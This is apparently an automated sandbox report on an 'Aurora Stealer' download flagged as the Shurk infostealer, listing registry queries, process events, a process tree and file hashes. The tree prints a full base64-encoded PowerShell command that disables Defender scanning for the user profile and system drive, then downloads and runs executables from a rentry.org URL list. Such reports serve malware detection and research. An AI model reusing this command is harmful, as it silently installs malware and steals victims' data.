Analysis
-
max time kernel
129s -
max time network
187s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
20-06-2023 07:48
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://anonfiles.com/y683map3zf
Resource
win10v2004-20230220-en
General
-
Target
https://anonfiles.com/y683map3zf
Malware Config
Extracted
https://rentry.org/xau9i/raw
Signatures
-
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
-
Shurk Stealer payload 7 IoCs
resource yara_rule behavioral1/files/0x0003000000022f20-1861.dat shurk_stealer behavioral1/files/0x0003000000022f20-1862.dat shurk_stealer behavioral1/files/0x0003000000000715-1867.dat shurk_stealer behavioral1/files/0x0003000000000715-1869.dat shurk_stealer behavioral1/files/0x0003000000000715-1883.dat shurk_stealer behavioral1/memory/1588-1881-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer behavioral1/memory/3404-1913-0x00007FF729890000-0x00007FF72B19B000-memory.dmp shurk_stealer -
Blocklisted process makes network request 1 IoCs
flow pid Process 145 4340 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation Aurora.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation LX.exe -
Executes dropped EXE 3 IoCs
pid Process 1588 Aurora.exe 3404 Aurora.exe 3760 LX.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133317209079630279" chrome.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4816 chrome.exe 4816 chrome.exe 4340 powershell.exe 4340 powershell.exe 1996 chrome.exe 1996 chrome.exe 2596 powershell.exe 2596 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe Token: SeShutdownPrivilege 4816 chrome.exe Token: SeCreatePagefilePrivilege 4816 chrome.exe -
Suspicious use of FindShellTrayWindow 61 IoCs
pid Process 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 3684 7zFM.exe 3684 7zFM.exe 2344 7zFM.exe 2344 7zFM.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe 4816 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4816 wrote to memory of 4784 4816 chrome.exe 81 PID 4816 wrote to memory of 4784 4816 chrome.exe 81 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 5092 4816 chrome.exe 83 PID 4816 wrote to memory of 4056 4816 chrome.exe 84 PID 4816 wrote to memory of 4056 4816 chrome.exe 84 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85 PID 4816 wrote to memory of 5048 4816 chrome.exe 85
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://anonfiles.com/y683map3zf1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbe8e29758,0x7ffbe8e29768,0x7ffbe8e297782⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:22⤵PID:5092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:4056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1340 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:5048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3228 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:12⤵PID:560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3244 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:12⤵PID:3264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=5004 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:12⤵PID:1632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:1152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5160 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:3520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5244 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:4580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5256 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:4828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5460 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:4252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5572 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:12⤵PID:4372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5520 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:12⤵PID:3908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5100 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:12⤵PID:656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:2148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:82⤵PID:1344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4756 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1996
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4712
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2508
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\AURORA_STEALER.rar"1⤵
- Suspicious use of FindShellTrayWindow
PID:3684
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\AURORA_STEALER\AURORA_STEALER.exe"1⤵
- Suspicious use of FindShellTrayWindow
PID:2344
-
C:\Users\Admin\Downloads\AURORA_STEALER\Aurora.exe"C:\Users\Admin\Downloads\AURORA_STEALER\Aurora.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\Aurora.exe"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"2⤵
- Executes dropped EXE
PID:3404
-
-
C:\Users\Admin\AppData\Local\Temp\LX.exe"C:\Users\Admin\AppData\Local\Temp\LX.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAZgBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAbQBtACMAPgA7ACIAOwA8ACMAcwBxAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAGcAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB0AGgAZwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAHgAYQAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AeABhAHUAOQBpAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBqAHoAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBtAGIAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAGgAaQBsACMAPgA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#cfg#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#pmm#>;4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2596
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
240B
MD5f973eab9c021538d21c16ce3f04290fa
SHA19c3a5f60694fcc39ce00bba43e7ed18749373551
SHA25622d367b590e309a2a519a0292845450ad13bcaf78a5ba52445f632e2d1a7d386
SHA512e7a1c9961d3c5d78c60c4e4bd6559e0c511fda7eca7b8c291e95e5eaa64f2ef7a8c7193684a8103448a161941bddf6ed1914f34ce66c12736e00d18210223b4b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\en_CA\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
3KB
MD58a9041b2c80e814ce78e2cefb6a398af
SHA1ddb3317d8d976911c16f6147a7b7e4c3fc23f034
SHA2567da61f39c516bb9baa3dc0b62790d99f83b080b2865389d15452a2b8d12629d3
SHA5129902ae7bc55e7c263d30d96759ccd8a9d07754fdbffbe311648556d08d7d9b1828d82db7f566e808a03de4cef036c2656b6a1e8de4e4a07486bcdaea65f3e54c
-
Filesize
872B
MD50eb696d656d98cef809de7d1b9c47ecb
SHA16af3b0b07001e38160c2841b8ffa353227d1b7cd
SHA256b900efff953bdf0f21fdc4c2f956e641eef524677ded1ba381d439c5c1360672
SHA51288004e833f10e5d9034bd008cb3e4603cf798ac3f28ab588a032653322d071759d6ba0c6f31d0a6d0b2bfde9566628799b4cdd98f0b28802296b4f2aed240dba
-
Filesize
537B
MD567e90d05f28f5797e69ec137c3437663
SHA130bfcc7165838913050731534f4514f82c786d8b
SHA256311b539498d56d41a50d42787a6ac6a3a5333e2dde06b7980c0d168213900e4a
SHA5123f36919d35efca6bc1c4c8e8f96694be61534195fc89f12145efcdcbcbf764ad348314b8880bf0a399532689d58688f081af490489feb723ddcbd92f42e8b085
-
Filesize
7KB
MD57efa3a59bea32cbfcbd7c729ca004863
